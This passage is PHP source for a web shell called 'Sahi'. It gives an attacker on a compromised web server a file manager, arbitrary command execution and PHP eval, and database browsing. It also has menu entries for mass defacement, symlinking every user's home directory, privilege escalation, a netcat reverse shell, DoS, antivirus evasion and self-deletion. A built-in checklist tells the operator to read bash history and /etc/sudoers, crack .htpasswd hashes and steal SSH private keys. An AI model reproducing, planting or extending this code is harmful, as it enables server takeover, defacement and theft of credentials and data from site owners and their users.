$val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_POST as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_COOKIE as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; if (!isset($_SESSION["current_dir"])){ $_SESSION["current_dir"]=$path_info["dirname"]."/"; if (!$islinux) { $_SESSION["current_dir"] = ucfirst($_SESSION["current_dir"]); } } $current_dir=$_SESSION["current_dir"]; chdir($current_dir); if(!isLogged() and isset($_REQUEST['cv'])) { $script = basename(__FILE__); header("Location: $script"); exit(0); } if(!isLogged()) { try { $username = isset($_REQUEST['username'])? $_REQUEST['username']:""; $password = isset($_REQUEST['password'])? $_REQUEST['password']:""; if($username===$u and md5($password)===$p) { session_regenerate_id(); $_SESSION['username']='admin'; $script = basename(preg_replace('@\(.*\(.*$@', '', __FILE__)); header("Location: {$script}"); } else { displayLoginForm(); exit(0) ; } } catch(Exception $e) { echo "Error: ". $e->getMessage(); } } initializeSession(); displayPage(); function initializeSession() { global $current_dir, $cv, $ajx,$rpath, $path_info,$home, $dl, $del, $filename, $cd, $acp, $upl,$md,$defacePath,$ev,$sd,$connectDatabase,$listTables, $dlf,$dff,$tableData,$killPids,$Find,$cdf,$dlfile,$command,$NewFolder, $NewFile,$delf,$oldfname,$newfname,$vf,$cds; global $rnd; $rnd=rand(10,99); if(!isset($_SESSION['current_dir'])) $_SESSION['current_dir']=$current_dir; if(!isset($_SESSION["view"])) $_SESSION["view"]="File Manager"; if(!isset($_SESSION['HomeDir'])) $_SESSION['HomeDir'] = $path_info['dirname']; if(isset($cv)) { if($cv==1) { $_SESSION["view"]="File Manager"; } else if($cv==2) { $_SESSION["view"]="Upload"; } else if($cv==3) { $_SESSION["view"]="CMD"; } else if($cv==4) { $_SESSION["view"]="Database"; } else if($cv==5) { $_SESSION["view"]="Mass Deface"; } else if($cv==6) { $_SESSION["view"]="Symlink"; } else if($cv==7) { $_SESSION["view"]="Process"; } else if($cv==8) { $_SESSION["view"]="Eval"; } else if($cv==9) { $_SESSION["view"]="Find"; } else if($cv==10) { $_SESSION["view"]="Rooting"; } else if($cv==='chp') { $_SESSION["view"]="chp"; } else if($cv==13) { $_SESSION["view"]="Config"; } else if($cv==14) { $_SESSION["view"]="Mailer"; } else if($cv==15) { $_SESSION["view"]="Domains"; } else if($cv==16) { $_SESSION["view"]="Headers"; } else if($cv==17) { $_SESSION["view"]="Netcat"; } else if($cv==18) { $_SESSION["view"]="Commands"; } else if($cv==20) { $_SESSION['view']="Info"; } else if($cv==21) { $_SESSION["view"]="Hash"; } else if($cv==22) { $_SESSION["view"]="ZoneH"; } else if($cv==23) { $_SESSION["view"]="Exploit"; } else if($cv==24) { $_SESSION["view"]="Code Inject"; } else if($cv==25) { $_SESSION["view"]="Bypassers"; } else if($cv==26) { $_SESSION["view"]="DoS"; } else if($cv==27) { $_SESSION["view"]="Logs"; } else if($cv==28) { $_SESSION["view"]="SelfKill"; } else if($cv==29) { $_SESSION["view"]="Forums"; } else if($cv==37) { $_SESSION["view"]="PortScanner"; } else if($cv==34) { $_SESSION["view"]="EvadeAV"; } else if($cv==11) { session_destroy(); } header("Location: {$rpath}"); exit(0); } if(isset($upl)) { saveFile(); } if(isset($dff) and $dff=='Copy') { $_SESSION['Copy'] = $_POST['fileItem']; $_SESSION['CopyPath']=$_SESSION['current_dir']; $_SESSION['lastAction']='Copy'; header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Cut') { $_SESSION['Cut'] = $_POST['fileItem']; $_SESSION['CutPath']=$_SESSION['current_dir']; $_SESSION['lastAction']='Cut'; header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Paste') { processPaste(); header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Delete') { processDelete(); header("Location: {$rpath}"); exit(0); } if(isset($dff) and $dff=='Zip') { compressFileFolder($_POST['fileItem']); header("Location: {$rpath}"); exit(0); } if(isset($killPids)) { killProcesses($_POST['killPid']); } if(isset($md)) { massDeface($defacePath); } if(isset($NewFolder)) { chdir($_SESSION['current_dir']); mkdir($NewFolder); chmod($NewFolder,0777); header("Location: {$rpath}"); exit(0); } if(isset($NewFile)) { chdir($_SESSION['current_dir']); touch($NewFile); chmod($NewFile,0777); header("Location: {$rpath}"); exit(0); } if(isset($connectDatabase)) { list($u,$h)=explode("@",$connectDatabase); echo listDatabases($u,$h); exit(0); } if(isset($listTables)) { list($u,$h,$db)=explode("@",$listTables); echo listTables($u,$h,$db); exit(0); } if(isset($command)) { $_SESSION['command']=$command; header("Location: {$rpath}"); exit(0); } if(isset($delf)) { total_delete($delf); header("Location: {$rpath}"); exit(0); } if(isset($oldfname) and isset($newfname)) { rename($oldfname,$newfname); header("Location: {$rpath}"); exit(0); } if(isset($dlf)) { $filename = compressFolder($dl); //$filename = compressFileFolder(); download(); exit(0); } if(isset($dff)) { $filename = compressFileFolder($_POST['fileItem']); download(); exit(0); } if(isset($tableData)) { list($u,$h,$db,$tbl)=explode("@",$tableData); echo displayTableData($u,$h,$db,$tbl); exit(0); } if(isset($ev)) { phpEval(); exit(0); } if(isset($sd)) { saveDatabaseCredentials(); exit(0); } if(isset($dl)) { global $filename; if($dlfile) $filename = $dl; else $filename = $_SESSION['current_dir'].$dl; download(); //header("Location: {$rpath}"); //exit(0); } if(isset($cd)) { chdir($_SESSION['current_dir']); chdir($cd); $_SESSION['current_dir']=format_path(getcwd()); if($cdf) { $_SESSION["view"]="File Manager"; } header("Location: {$rpath}"); exit(0); } if(isset($cds)) { chdir($cds); $_SESSION['current_dir']=format_path(getcwd()); $_SESSION["view"]="File Manager"; header("Location: {$rpath}"); exit(0); } if(isset($home)) { $_SESSION['current_dir']=format_path($_SESSION['HomeDir']); $_SESSION["view"]="File Manager"; header("Location: {$rpath}"); exit(0); } if(isset($acp)) { ajaxCurrentPath(); exit(0); } if(isset($_SESSION["view"])) { if( $_SESSION["view"]=="CMD" and isset($ajx) and $ajx==1) { echo execute_cmd(); exit(0); } } } function includePopups() { ?>
New Folder:
New File:
New File:
"; includeHead(); echo ""; includeBanner(); includeMenuBar(); includeCurrentPath(); includePopups(); if(isset($vf)) { echo "
"; echo "
"; exit(0); } if(isset($_SESSION["view"])) { if( $_SESSION["view"]==="File Manager") { displayFileManager(); } else if($_SESSION['view']==="Upload") { displayUpload(); } else if( $_SESSION["view"]==="CMD") { displayCMD(); }else if( $_SESSION["view"]==="Database") { displayDatabase(); } else if( $_SESSION["view"]==="Symlink") { displaySymlink(); } else if( $_SESSION["view"]==="Mass Deface") { displayMassDeface(); } else if( $_SESSION["view"]==="EvadeAV") { displayEvadeAV(); } else if( $_SESSION["view"]==="Process") { displayProcess(); } else if( $_SESSION["view"]==="Forums") { displayForums(); } else if( $_SESSION["view"]==="Eval") { displayEval(); } else if( $_SESSION["view"]==="Mailer") { displayMailer(); } else if( $_SESSION["view"]==="Domains") { displayDomains(); } else if( $_SESSION["view"]==="Info") { displayInfo(); } else if( $_SESSION["view"]==="Commands") { displayCommands(); } else if( $_SESSION["view"]==="Netcat") { displayReverseNetcat(); } else if( $_SESSION["view"]==="Hash") { displayHash(); } else if( $_SESSION["view"]==="Find") { displayFind(); if(isset($Find)) { processFind(); exit(0); } } else if( $_SESSION["view"]==="Rooting") { displayRooting(); } else if( $_SESSION["view"]==="ZoneH") { displayZoneH(); } else if( $_SESSION["view"]==="Exploit") { displayExploit(); } else if( $_SESSION["view"]==="Code Inject") { displayCodeInject(); } else if( $_SESSION["view"]==="Bypassers") { displayBypassers(); } else if( $_SESSION["view"]==="DoS") { displayDoS(); } else if( $_SESSION["view"]==="PortScanner") { displayPortScanner(); } else if( $_SESSION["view"]==="Logs") { displayLogs(); } else if( $_SESSION["view"]==="SelfKill") { displaySelfKill(); } else if( $_SESSION["view"]==="chp") { if(isset($oldusername) and isset($oldpassword) and isset($newusername) and isset($newpassword)) { displayChangePassword(); processChangePassword(); } else { displayChangePassword(); } } else if( $_SESSION["view"]==="Headers") { displayHeaders(); } else if( $_SESSION["view"]==="Config") { findConfig(); } } echo ""; } function includeCurrentPath() { global $islinux, $rpath; echo "
"; $l = $_SESSION['current_dir']; if($l[strlen($l)-1] === '/') $l = substr($l,0,strlen($l)-1); //echo $l; //echo str_replace("/","",$_SESSION['current_dir'],$l); $path = explode("/",$l); $cd=""; if($islinux===false) { foreach (range("A", "Z") as $letter){ if(is_readable($letter.":\\")){ $letter.":"; echo "[ " . $letter . "\\ ]"; //$res .= "drive ".$drive."".format_bit(@disk_free_space($drive))." free of ".format_bit(@disk_total_space($drive)).""; } } echo " - "; foreach ($path as $p) { $cd.=$p . "\\"; echo "" . $p . "\\"; } } else { foreach ($path as $p) { $cd.=$p . "/"; echo "" . $p . "/"; } } echo "
"; } function ajaxCurrentPath() { global $islinux, $rpath; $l = $_SESSION['current_dir']; if($l[strlen($l)-1] === '/') $l = substr($l,0,$l-1); //echo $l; //echo str_replace("/","",$_SESSION['current_dir'],$l); $path = explode("/",$l); $cd=""; if($islinux===false) { foreach ($path as $p) { $cd.=$p . "\\"; echo "" . $p . "\\"; } } } function includeHead() { echo "Sahi"; includeCSS(); includeJavascript(); echo ""; } function includeCSS() { ?> "; echo ""; banner(); echo ""; } function includeMenuBar() { global $rpath; ?> $aux ,"fsize"=> (get_size($aux)),"perms"=>show_perms(fileperms($aux)), "mdate"=>date('d-M-Y h:i:s', filemtime($aux))); else $dir[]=array("fname"=>"[ {$aux} ]","fsize"=> "Dir","perms"=>show_perms(fileperms($aux)), "mdate"=>date('d-M-Y h:i:s', filemtime($aux))); //} } @closedir($handle); } else $total = filesize($arg); } asort($dir); return $dir; } function displayDirList( $dir) { global $rpath, $islinux; echo "
"; echo ""; if($islinux) { echo ""; } echo ""; foreach ($dir as $d) { if($d['fname'][0]==='[') { $tname = str_replace("[ ","",$d['fname']); $tname = str_replace(" ]","",$tname); echo "\n"; echo ""; echo ""; echo ""; if($islinux) { $o = posix_getpwuid(fileowner($tname)); $g = posix_getgrgid(filegroup($tname)); echo ""; } echo ""; echo ""; echo ""; echo ""; } } foreach ($dir as $d) { if($d['fname'][0]!=='[') { echo "\n"; echo ""; //if(is_dir($d['fname'])) //{ //echo ""; //} //else { //echo ""; // } echo ""; echo ""; if($islinux) { //echo ""; $o = posix_getpwuid(fileowner($d['fname'])); $g = posix_getgrgid(filegroup($d['fname'])); echo ""; } echo ""; echo ""; echo ""; echo ""; } } echo "
FilenameSizeOwner:GroupPermsModifiedAction
{$d["fname"]}".$d["fsize"] . "". $o['name'] . ":" . $g['name']. "".$d["perms"] . "".$d["mdate"] . ""; echo "Rename"; echo "DeleteDownload
{$d["fname"]}{$d["fname"]}{$d["fname"]}".$d["fsize"] . "";//. posix_getpwuid(fileowner($d['fname']))['name'] . //":" . posix_getgrgid(filegroup($d['fname']))['name']. // echo "". $o['name'] . ":" . $g['name']. "".$d["perms"] . "".$d["mdate"] . "View"; echo "Rename"; echo "DeleteDownload

"; echo "Actions: "; echo ""; echo ""; // onclick=\"displayNewFile('NewFile');return false;\">"; echo " "; echo ""; echo ""; echo ""; echo ""; echo ""; echo "
"; } function displayUpload() { global $rpath; ?>
Select File!
"; ?>
"; if(!$islinux) { echo "
"; exec("tasklist 2>NUL", $task_list); for ($i=3;$i"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; // echo $task_line . "
"; } echo "
ProcessPIDSess NameSess#Mem Usage
{$pname}{$pid}{$sname}{$snumber}{$memusage} {$unit}

"; } else { echo "
"; exec("ps aux ", $task_list); for ($i=3;$i"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "
USERPID%CPU %MEMVSZRSSTTYSTATSTARTTIMECOMMAND
{$user}{$pid}{$cpu}{$mem}{$vsz}{$rss}{$tty}{$stat}{$start}{$time}{$command1}

"; } //echo ""; } function killProcesses($pids) { global $islinux; foreach ($pids as $pid) { if(!$islinux) { exec("taskkill /F /PID $pid"); } else { exec("kill -9 {$pid}"); } } } function displayFind() { chdir($_SESSION['current_dir']); ?>
Search in:
Dirname contains:
Filename contains:
File Contain:
Permissions: Readable Writable Executable
"; findNameContain($searchIn,$dirnamecontain,$filenamecontain); echo ""; } function findNameContain($searchIn, $dirnamecontain,$filenamecontain) { global $rpath,$filecontain,$readable,$writable,$executable; chdir($searchIn); // Create recursive directory iterator /** @var SplFileInfo[] $files */ $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $searchIn), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { // Skip directories (they would be added automatically) $filePath = $file->getRealPath(); if (!$file->isDir() and $filenamecontain!=="" and strpos($name,$filenamecontain)!==false) { // Get real and relative path for current file echo "".$filePath . "
"; } if (!$file->isDir() and $filecontain!=="") { // Get real and relative path for current file if(findFileContent($filePath,$filecontain)) { echo "".$filePath . "
"; } } else if($file->isDir() and strpos($file,'..')===false and $dirnamecontain!=="" and strpos($name,$dirnamecontain)!==false) { echo "".$filePath. "
"; } $p1 = fileperms($filePath); $perms = show_perms($p1); if ( ( isset($readable) and strpos($perms,'r')!=false) or (isset($writable) and strpos($perms,'w') !=false) or (isset($executable) and strpos($perms,'x')!=false) ) { // Get real and relative path for current file if(!$file->isDir() and strpos($file,'..')===false) { echo "".$filePath . "
"; } else if(strpos($file,'..')===false) { echo "".$filePath. "
"; } } } } function findFileContent($file,$pattern) { $data = file_get_contents($file); //if(strpos($data)) //var_dump($data); if(strpos($data,$pattern)!==false) { return true; } return false; } function phpEval() { global $ev; //eval(stripslashes($ev)); eval($ev); } function displayEval() { global $rpath; ?>
Welcome!
1 - Search rooting exploit to escalate privileges.
2 - Symlink webserver.
3 - Find database connection files using: find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect" 4 - Find database user with admin privileges.
5 - Search for username and password in webserver logs
6 - Search Bash history for passwords, e.g. cat /home/UserName/.bash_history , cat /root/.bash_history
7 - Find apache .htpasswd and Crack passwords with Hashcat.
8 - Read emails on Server.
9 - Exploit cat /etc/crontab
10 - Get files edited with vi editor by appending ~ to file name
11- Crack all passwords for web application users, one of them will have sudo su priviliges.
12- cat /etc/sudoers
13- Trash files# cat /home/UserName/.local/share/Trash/files/Payroll
14- Steal ssh private keys






"; echo ""; foreach($lines as $line) { list($user,,,,,$home,)=explode(":",$line); echo ""; exec("ln -s ".$home . " ". $user,$output); } echo ""; } else { echo "
Is this linux machine???
"; } } function displayDatabase() { global $rpath,$v,$connect,$disconnect,$query,$rem; if(isset($connect)) { list($u,$h)=explode("@",$connect); selectDatabase($u, $h); //$v='cn'; } if(isset($rem)) { list($u,$h)=explode("@",$rem); removeDatabase($u, $h); $v='cn'; } if(isset($disconnect)) { //list($u,$h)=explode("@",$connect); //selectDatabase($u, $h); unset($_SESSION['selected']); } ?>
Connections Databases Query
".$user." ".$home."
Username:
Password:
Database:
Host:
"; if(isset($_SESSION['selected'])) { listDatabases(); } else displayDatabaseCredentials(); echo ""; } else if($v=='tb') { echo "
"; if(isset($_SESSION['selected'])) { listDatabases(); } echo "
"; echo "
"; list($u,$h,$db)=explode("@",$connect); listTables($u,$h,$db); $_SESSION['selectddb']=$connect; echo "
"; } else if($v=='tbld') { echo "
"; if(isset($_SESSION['selected'])) { listDatabases(); } echo "
"; echo "
"; list($u,$h,$db)=explode("@",$connect); listTables($u,$h,$db); echo "
"; echo "
"; list($u,$h,$db,$tbl)=explode("@",$connect); displayTableData($u,$h,$db,$tbl); $_SESSION['selectedtbl']=$connect; echo "
"; } else if($v=='qd') { $db="db"; $tbl="tbl"; if(isset($_SESSION['selectedtbl'])) list($u,$h,$db,$tbl)=explode("@",$_SESSION['selectedtbl']); ?>
setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); if(!(preg_match("/^select.*/i",$query)===1)) { echo "
Modified Rows: " . $db->exec($query) ."
"; break; } $rows = $db->query($query); if($rows) { $count=$rows->rowCount(); } else $count=0; echo "
"; if($count>0) { $count--; $row=$rows->fetch(); echo ""; $i=1; foreach ($row as $k=>$v) { if($i%2===1) echo ""; $i++; } echo ""; echo ""; $i=1; foreach ($row as $k=>$v) { if($i%2===1) echo ""; $i++; } echo ""; } while($count>0) { $row=$rows->fetch(); echo ""; $i=1; foreach ($row as $k=>$v) { if($i%2===1) echo ""; $i++; } echo ""; $count--; } echo "
".$k . "
".$v . "
".$v . "
"; } catch(PDOException $abc ) { echo "Error: ".$abc->getMessage(); } } break; } } function displayDatabaseCredentials() { global $rpath; $output=""; if(!isset($_SESSION['dbconnections'])) return $output; echo ""; $u=""; $h=""; if(isset($_SESSION['selected'])) list($u,$h)=explode("@",$_SESSION['selected']); foreach ($_SESSION['dbconnections'] as $con) { if($con['dbusername']===$u and $con['dbhost']===$h){ echo ""; } else echo ""; //$output.= " {$con['dbusername']} @ {$con['dbhost']}
"; //$output.= " {$con['dbusername']} @ {$con['dbhost']}
"; //$output.= " {$con['dbusername']} @ {$con['dbhost']}
"; //javascript: } return $output; } function saveDatabaseCredentials() { global $dbusername, $dbpassword, $dbname, $dbhost; if(!isset($_SESSION['dbconnections'])) $_SESSION['dbconnections']= array(); $dbhost=(isset($dbhost) and $dbhost!=="")?$dbhost:"localhost"; $_SESSION['dbconnections'][]=array('dbusername'=>$dbusername,'dbpassword'=>$dbpassword, 'dbname'=>$dbname,'dbhost'=>$dbhost); echo displayDatabaseCredentials(); } function connectSelectedDb() { global $con; global $mysqlHandle; list($u,$h)=explode("@",$_SESSION['selected']); foreach ($_SESSION['dbconnections'] as $con1) { if($con1['dbusername']===$u and $con1['dbhost']===$h) { $con=$con1; $mysqlHandle = @mysql_connect( $h.":3306", $u, $con['dbpassword'] ); break; } } } function selectDatabase($u,$h){ $_SESSION['selected']=$u."@".$h; } function removeDatabase($u,$h){ for($i=0;count($_SESSION['dbconnections']);$i++) { if($_SESSION['dbconnections'][$i]['dbusername']===$u and $_SESSION['dbconnections'][$i]['dbhost']===$h) { unset($_SESSION['dbconnections'][$i]); unset($_SESSION['selected']); $_SESSION['dbconnections']=array_values($_SESSION['dbconnections']); break; } } } function listDatabases() { global $mysqlHandle, $PHP_SELF, $con; connectSelectedDb(); $pDB = mysql_list_dbs( $mysqlHandle ); $num = mysql_num_rows( $pDB ); //$output = "[ {$u} @ {$h} ]
"; $output=""; for( $i = 0; $i < $num; $i++ ) { $dbname = mysql_dbname( $pDB, $i ); //$output.= $dbname . "
"; $output.= " {$dbname}
"; } echo $output; // return $output; //return "this is list of databases ".$u."@" . $h; } function listTables($u,$h,$dbname) { global $mysqlHandle, $PHP_SELF,$con; connectSelectedDb(); $pTable = mysql_list_tables( $dbname ); if( $pTable == 0 ) { $msg = mysql_error(); echo "

Error : $msg

\n"; return; } $num = mysql_num_rows( $pTable ); $output="[ {$dbname} ]
"; for( $i = 0; $i < $num; $i++ ) { $tablename = mysql_tablename( $pTable, $i ); //echo $tablename."
"; $output.= " {$tablename}
"; } echo $output; } function displayTableData($u,$h,$dbname,$tablename) { //global $mysqlHandle, $PHP_SELF,$con; //echo "this is table data; {$u} {$h} {$dbname} {$tablename}"; global $action, $mysqlHandle, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby; connectSelectedDb(); if( $tablename != "" ) echo "

[ $dbname > $tablename ]

\n"; else echo "

$dbname

\n"; $queryStr=""; $queryStr = stripslashes( $queryStr ); if( $queryStr == "" ) { $queryStr = "SELECT * FROM $tablename"; //if( $orderby != "" ) // $queryStr .= " ORDER BY $orderby"; //echo "Add Data | \n"; //echo "Schema\n"; } $pResult = mysql_db_query( $dbname, $queryStr ); $fieldt = mysql_fetch_field($pResult); $tablename = $fieldt->table; $errMsg = mysql_error(); //$GLOBALS[queryStr] = $queryStr; if( $pResult == false ) { echoQueryResult(); return; } if( $pResult == 1 ) { $errMsg = "Success"; echoQueryResult(); return; } echo "
\n"; $row = mysql_num_rows( $pResult ); $col = mysql_num_fields( $pResult ); if( $row == 0 ) { echo "No Data Exist!"; return; } if( $rowperpage == "" ) $rowperpage = 30; if( $page == "" ) $page = 0; else $page--; mysql_data_seek( $pResult, $page * $rowperpage ); echo "
{$con['dbusername']} @ {$con['dbhost']} Disconnect Remove
{$con['dbusername']} @ {$con['dbhost']} ConnectRemove
\n"; echo "\n"; for( $i = 0; $i < $col; $i++ ) { $field = mysql_fetch_field( $pResult, $i ); echo "\n"; } echo "\n"; echo "\n"; for( $i = 0; $i < $rowperpage; $i++ ) { $rowArray = mysql_fetch_row( $pResult ); if( $rowArray == false ) break; echo "\n"; $key = ""; for( $j = 0; $j < $col; $j++ ) { $data = $rowArray[$j]; $field = mysql_fetch_field( $pResult, $j ); if( $field->primary_key == 1 ) $key .= "&" . $field->name . "=" . $data; if( strlen( $data ) > 30 ) $data = substr( $data, 0, 30 ) . "..."; $data = htmlspecialchars( $data ); echo "\n"; } if( $key == "" ) echo "\n"; else { echo "\n"; echo "\n"; } echo "\n"; } echo "
"; if($action == "dmlld0RhdGE=") echo "".$field->name."\n"; else echo $field->name."\n"; echo "Action
\n"; echo "$data\n"; echo "no KeyEditDelete
\n"; } function displayLoginForm() { echo ""; includeHead(); echo ""; includeBanner(); includeMenuBar(); ?>
Username:
Password:
"; } function isLogged() { if(isset($_SESSION['username']) and $_SESSION['username']==='admin' ) return true; return false; } function get_client_ip() { $ipaddress = ''; if(isset($_SERVER['REMOTE_ADDR']) ) { $ipaddress = $_SERVER['REMOTE_ADDR']; } else if (isset($_SERVER['HTTP_CLIENT_IP'])) $ipaddress = $_SERVER['HTTP_CLIENT_IP']; else if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else if(isset($_SERVER['HTTP_X_FORWARDED'])) $ipaddress = $_SERVER['HTTP_X_FORWARDED']; else if(isset($_SERVER['HTTP_FORWARDED_FOR']) ) $ipaddress = $_SERVER['HTTP_FORWARDED_FOR']; else if(isset($_SERVER['HTTP_FORWARDED'])) $ipaddress = $_SERVER['HTTP_FORWARDED']; if (strpos($ipaddress, ',') !== false) { $ips = explode(',', $ipaddress); $ipaddress = trim($ips[0]); } if ($ipaddress == '::1') $ipaddress = 'localhost'; return $ipaddress; } function getServerURL() { $url = (isset($_SERVER["HTTPS"]) and $_SERVER["HTTPS"] == "on")?"https://":"http://"; $url .= isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:""; // $_SERVER["HTTP_HOST"] is equivalent if (isset($_SERVER["SERVER_PORT"]) and $_SERVER["SERVER_PORT"] != "80") $url .= ":".$_SERVER["SERVER_PORT"]; return $url; } function getCompleteURL() { return getServerURL().(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:""); } function total_delete($arg) { if (file_exists($arg)) { @chmod($arg,0755); if (is_dir($arg)) { $handle = opendir($arg); while($aux = readdir($handle)) { if ($aux != "." && $aux != "..") total_delete($arg."/".$aux); } @closedir($handle); rmdir($arg); } else unlink($arg); } } function total_copy($orig,$dest) { $ok = true; if (file_exists($orig)) { if (is_dir($orig)) { mkdir($dest,0755); $handle = opendir($orig); while(($aux = readdir($handle))&&($ok)) { if ($aux != "." && $aux != "..") $ok = total_copy($orig."/".$aux,$dest."/".$aux); } @closedir($handle); } else $ok = copy((string)$orig,(string)$dest); } return $ok; } function total_move($orig,$dest) { // Just why doesn't it has a MOVE alias?! return rename((string)$orig,(string)$dest); } function download(){ global $current_dir,$filename; $file = $filename; if(file_exists($file)){ $is_denied = false; /* foreach($download_ext_filter as $key=>$ext){ if (eregi($ext,$filename)){ $is_denied = true; break; } } */ if (!$is_denied){ $size = filesize($file); header("Content-Type: application/save"); header("Content-Length: $size"); header("Content-Disposition: attachment; filename=\"$filename\""); header("Content-Transfer-Encoding: binary"); if ($fh = fopen("$file", "rb")){ fpassthru($fh); fclose($fh); } else alert(et('ReadDenied').": ".$file); } else alert(et('ReadDenied').": ".$file); } else echo 'FileNotFound'; } function execute_cmd(){ global $cmd; //header("Content-type: text/plain"); $output=""; if(isset($_SESSION['current_dir'])) chdir($_SESSION['current_dir']); if (strlen($cmd)){ echo "\n\n# ".$cmd."\n"; if(strpos($cmd, "cd ")===0) { $cmd = str_replace("cd ", "", $cmd); //echo "present directory: " . getcwd() . "\n" . $cmd . "\n"; chdir($cmd); $_SESSION['current_dir']=format_path(getcwd()); return getcwd(); } if(preg_match("/.:/",$cmd)===1) { chdir($cmd); $_SESSION['current_dir']=format_path(getcwd()); return getcwd(); } if(strpos($cmd, "pwd")===0) { return getcwd() . "\n"; } exec($cmd,$mat,$rtrn); $_SESSION['current_dir']=format_path(getcwd()); echo $_SESSION['current_dir']; if (count($mat)) //$output.= trim(implode("\n
",$mat)); { //echo "inside count"; //$output.= html_encode( implode("\n",$mat)); $output.= implode("\n",$mat); } else $output.= ""; } else $output.="NoCmd"; return $output; } function execute_file(){ global $current_dir,$filename; header("Content-type: text/plain"); $file = $current_dir.$filename; if(file_exists($file)){ echo "# ".$file."\n"; exec($file,$mat); if (count($mat)) echo trim(implode("\n",$mat)); } else alert(et('FileNotFound').": ".$file); } function save_upload($temp_file,$filename,$dir_dest) { global $upload_ext_filter; $filename = remove_special_chars($filename); $file = $dir_dest.$filename; $filesize = filesize($temp_file); $is_denied = false; if (!$is_denied){ if (!check_limit($filesize)){ if (file_exists($file)){ if (unlink($file)){ if (copy($temp_file,$file)){ @chmod($file,0755); $out = 6; } else $out = 2; } else $out = 5; } else { if (copy($temp_file,$file)){ @chmod($file,0755); $out = 1; } else $out = 2; } } else $out = 3; } else $out = 4; return $out; } function zip_extract(){ // extract $cmd_arg="test.zip"; global $cmd_arg,$current_dir,$islinux; $zip = zip_open($current_dir.$cmd_arg); //echo $current_dir.$cmd_arg; if ($zip) { while ($zip_entry = zip_read($zip)) { if (zip_entry_filesize($zip_entry)) { $complete_path = $path.dirname(zip_entry_name($zip_entry)); $complete_name = $path.zip_entry_name($zip_entry); if(!file_exists($complete_path)) { $tmp = ''; foreach(explode('/',$complete_path) AS $k) { $tmp .= $k.'/'; if(!file_exists($tmp)) { @mkdir($current_dir.$tmp, 0755); } } } if (zip_entry_open($zip, $zip_entry, "r")) { if ($fd = fopen($current_dir.$complete_name, 'w')){ fwrite($fd, zip_entry_read($zip_entry, zip_entry_filesize($zip_entry))); fclose($fd); } else echo "fopen($current_dir.$complete_name) error
"; zip_entry_close($zip_entry); } else echo "zip_entry_open($zip,$zip_entry) error
"; } } zip_close($zip); } } // +-------------------------------------------------- // | Data Formating // +-------------------------------------------------- function html_encode($str){ global $charSet; $str = preg_replace(array('/&/', '//', '/"/'), array('&', '<', '>', '"'), $str); // Bypass PHP to allow any charset!! $str = htmlentities($str, ENT_QUOTES, $charSet, false); return $str; } //echo rep(5,3); 33333 function rep($x,$y){ if ($x) { $aux = ""; for ($a=1;$a<=$x;$a++) $aux .= $y; return $aux; } else return ""; } //echo str_zero("123123","2"); function str_zero($arg1,$arg2){ if (strstr($arg1,"-") == false){ $aux = intval($arg2) - strlen($arg1); if ($aux) return rep($aux,"0").$arg1; else return $arg1; } else { return "[$arg1]"; } } //echo replace_double("123", "123123"); 123 function replace_double($sub,$str){ $out=str_replace($sub.$sub,$sub,$str); while ( strlen($out) != strlen($str) ){ $str=$out; $out=str_replace($sub.$sub,$sub,$str); } return $out; } //echo remove_special_chars("test�������444"); testAAAAAAC444 function remove_special_chars($str){ $str = trim($str); $str = strtr($str,"��������������������������������������������������������������!@#%&*()[]{}+=?", "YuAAAAAAACEEEEIIIIDNOOOOOOUUUUYsaaaaaaaceeeeiiiionoooooouuuuyy_______________"); $str = str_replace("..","",str_replace("/","",str_replace("\\","",str_replace("\$","",$str)))); return $str; } //echo format_path("c:\\test\\test.php"); C:/test/test.php/ function format_path($str){ global $islinux; $str = trim($str); $str = str_replace("..","",str_replace("\\","/",str_replace("\$","",$str))); $done = false; while (!$done) { $str2 = str_replace("//","/",$str); if (strlen($str) == strlen($str2)) $done = true; else $str = $str2; } $tam = strlen($str); if ($tam){ $last_char = $tam - 1; if ($str[$last_char] != "/") $str .= "/"; if (!$islinux) $str = ucfirst($str); } return $str; } function array_csort() { $args = func_get_args(); $marray = array_shift($args); $msortline = "return(array_multisort("; foreach ($args as $arg) { $i++; if (is_string($arg)) { foreach ($marray as $row) { $sortarr[$i][] = $row[$arg]; } } else { $sortarr[$i] = $arg; } $msortline .= "\$sortarr[".$i."],"; } $msortline .= "\$marray));"; eval($msortline); return $marray; } //echo show_perms(octdec("2755")); urwxr function show_perms( $P ) { $sP = ""; if($P & 0x1000) $sP .= 'p'; // FIFO pipe elseif($P & 0x2000) $sP .= 'c'; // Character special elseif($P & 0x4000) $sP .= 'd'; // Directory elseif($P & 0x6000) $sP .= 'b'; // Block special elseif($P & 0x8000) $sP .= '−'; // Regular elseif($P & 0xA000) $sP .= 'l'; // Symbolic Link elseif($P & 0xC000) $sP .= 's'; // Socket else $sP .= 'u'; // UNKNOWN // owner - group - others $sP .= (($P & 0x0100) ? 'r' : '−') . (($P & 0x0080) ? 'w' : '−') . (($P & 0x0040) ? (($P & 0x0800) ? 's' : 'x' ) : (($P & 0x0800) ? 'S' : '−')); $sP .= (($P & 0x0020) ? 'r' : '−') . (($P & 0x0010) ? 'w' : '−') . (($P & 0x0008) ? (($P & 0x0400) ? 's' : 'x' ) : (($P & 0x0400) ? 'S' : '−')); $sP .= (($P & 0x0004) ? 'r' : '−') . (($P & 0x0002) ? 'w' : '−') . (($P & 0x0001) ? (($P & 0x0200) ? 't' : 'x' ) : (($P & 0x0200) ? 'T' : '−')); return $sP; } //echo format_size(100000000); 95.37 Mb function format_size($arg) { if ($arg>0){ $j = 